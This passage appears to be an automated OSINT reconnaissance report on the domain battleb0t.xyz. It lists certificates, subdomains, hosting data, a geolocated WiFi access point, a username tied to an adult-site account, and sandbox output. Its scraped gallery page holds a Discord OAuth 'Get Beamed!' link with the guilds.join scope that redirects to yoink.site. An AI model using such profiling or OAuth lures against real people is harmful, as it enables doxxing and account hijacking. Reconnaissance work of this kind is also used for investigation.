64:00:42:35:30:9C:67:0E:E7:F4:15:29:43:E9:0B:EB:
EA:B5:DD:47:02:20:43:3C:D6:F2:D6:6A:25:2C:8C:A9:
19:78:E2:12:1F:E6:13:A2:C8:59:FC:58:1D:CC:B7:3C:
FE:5E:08:B2:25:67
Signature Algorithm: sha256WithRSAEncryption
26:53:65:d8:0f:da:9d:5c:c2:89:7f:e9:59:db:82:df:21:01:
bc:a3:b0:96:ec:a1:79:53:d3:6d:a2:73:a4:48:f5:f3:60:37:
2f:d6:c2:bc:34:d6:5c:7b:52:5d:a2:86:c6:22:cc:0d:88:a5:
09:9e:b7:e0:33:0e:94:6a:31:dd:1a:ce:0b:4a:1b:35:81:e8:
18:b8:67:35:7b:c5:55:5b:fa:24:e1:61:d8:fc:4c:fb:0b:69:
6d:b7:e9:88:a8:d9:f4:30:10:9e:d7:62:ac:85:d6:f5:b8:e4:
d1:e1:dd:33:91:22:79:d9:d1:27:2a:78:63:a1:7e:92:44:93:
5d:7f:b9:50:5b:7c:41:db:0c:39:77:23:a9:bf:96:10:23:77:
56:f9:ce:90:f2:c8:df:fc:44:22:77:ff:3a:73:64:da:f9:9d:
43:b8:69:0a:60:9d:7e:36:25:20:ea:05:1d:9b:94:cd:ee:68:
aa:a6:47:3a:63:73:de:dd:31:b0:d6:03:9e:95:3c:99:1c:f5:
c1:10:0c:3b:9b:5b:bb:2b:91:5b:f8:0b:8e:c1:0a:80:b1:82:
3c:fb:af:ea:e3:db:58:02:64:c3:ab:7a:c9:4d:e2:fc:10:3c:
ec:06:e0:99:ff:1b:90:aa:e6:ba:48:4e:20:e1:c2:59:01:96:
cd:48:36:11
| battleb0t.xyz |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 15169 | 34.74.160.0/20 |
| 2023-05-12 02:50:29 | Physical Address | No | GLEIF | 0 | 0 | 3 | 0 | None | C/O CORPORATION SERVICE COMPANY, 251 LITTLE FALLS DRIVE, WILMINGTON, US-DE, US, 19808 | Go Daddy, LLC |
| 2023-05-12 02:44:20 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.110.153 |
| 2023-05-12 02:44:31 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | pics.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | The Batcave (Net ID: 00:11:32:7C:A3:88) | 50.8897, 6.0563 |
| 2023-05-12 03:19:17 | Web Framework | No | Web Framework Identifier | 0 | 0 | 3 | 0 | None | Bootstrap | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.6.166 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | akashpmani.github.io | 185.199.110.153 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | xHamster (Category: XXXPORNXXX)
https://xhamster.com/users/ayshoo | ayshoo |
| 2023-05-12 02:47:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 13, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://riverside.fm/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"edge.fullstory.com"\n "ekr.zdassets.com"\n "js.hs-banner.com"\n "riverside.fm"\n "riversidefm.zendesk.com"\n "rs.fullstory.com"\n "static.zdassets.com"\n "track.hubspot.com"\n "www.comeet.co"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"riverside.fm"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6828:120:WilError_01"\n "Local\\SM0:4116:120:WilError_01"\n "Local\\SM0:4116:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:6828:304:WilStaging_02"\n "Local\\SM0:6828:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6828:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3800:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.134.250:80"\n "172.67.134.250:443"\n "142.251.32.42:443"\n "142.250.191.35:443"\n "99.84.238.172:443"\n "142.251.46.170:443"\n "185.199.111.153:443"\n "172.64.133.15:443"\n "104.18.7.3:443"\n "143.204.130.227:443"\n "142.250.189.206:443"\n "142.251.214.142:443"\n "104.18.70.113:443"\n "99.84.238.190:443"\n "157.240.22.25:443"\n "45.60.121.129:443"\n "99.84.238.103:443"\n "52.216.212.177:443"\n "142.250.189.232:443"\n "13.35.126.71:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Platform Notifications\\000003.log]- [targetUID: 00000000-00006828]\n "f_00024d" has type "Web Open Font Format (Version 2) TrueType length 37716 version 1.0"- [targetUID: N/A]\n "f_000268" has type "ISO Media MP4 v2 [ISO 14496-14]"- [targetUID: N/A]\n "4b022efb3c5a14dc_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\4b022efb3c5a14dc_0]- [targetUID: 00000000-00006828]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006828]\n "f_00023e" has type "PNG image data 338 x 732 8-bit colormap non-interlaced"- [targetUID: N/A]\n "f540820f-9f89-412f-923b-51d1f67340a2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "ed03a5b80f066844_0" has type "data"- [targetUID: N/A]\n "14bf4ad036e1a574_0" has type "data"- [targetUID: N/A]\n "f_000243" has type "PNG image data 1200 x 1200 8-bit colormap non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00002580]\n "97a3780cf75de2bb_0" has type "data"- [targetUID: N/A]\n "f_00023d" has type "PNG image data 800 x 450 8-bit colormap non-interlaced"- [targetUID: N/A]\n "6f7515d7-b36c-4d00-b122-1a7c8010b099.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\6f7515d7-b36c-4d00-b122-1a7c8010b099.tmp]- [targetUID: 00000000-00006828]\n "83e8ee8deb6b8139_0" has type "data"- [targetUID: N/A]\n "f_00026e" has type "data"- [targetUID: N/A]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "934c5a20edee0f55_0" has type "data"- [targetUID: N/A]\n "12a6f2f66e30a04a_0" has type "data"- [targetUID: N/A]\n "f_000274" has type "data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"rs.fullstory.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://riverside.fm/"\n Pattern match: "http://riverside.fm"\n Heuristic match: "riverside.fm"\n Heuristic match: "edge.fullstory.com"\n Heuristic match: "ekr.zdassets.com"\n Heuristic match: "js.hs-banner.com"\n Heuristic match: "riversidefm.zendesk.com"\n Heuristic match: "rs.fullstory.com"\n Heuristic match: "static.zdassets.com"\n Heuristic match: "track.hubspot.com"\n Pattern match: "www.comeet.co"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63dcded18cdba55a3f42cb19', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, 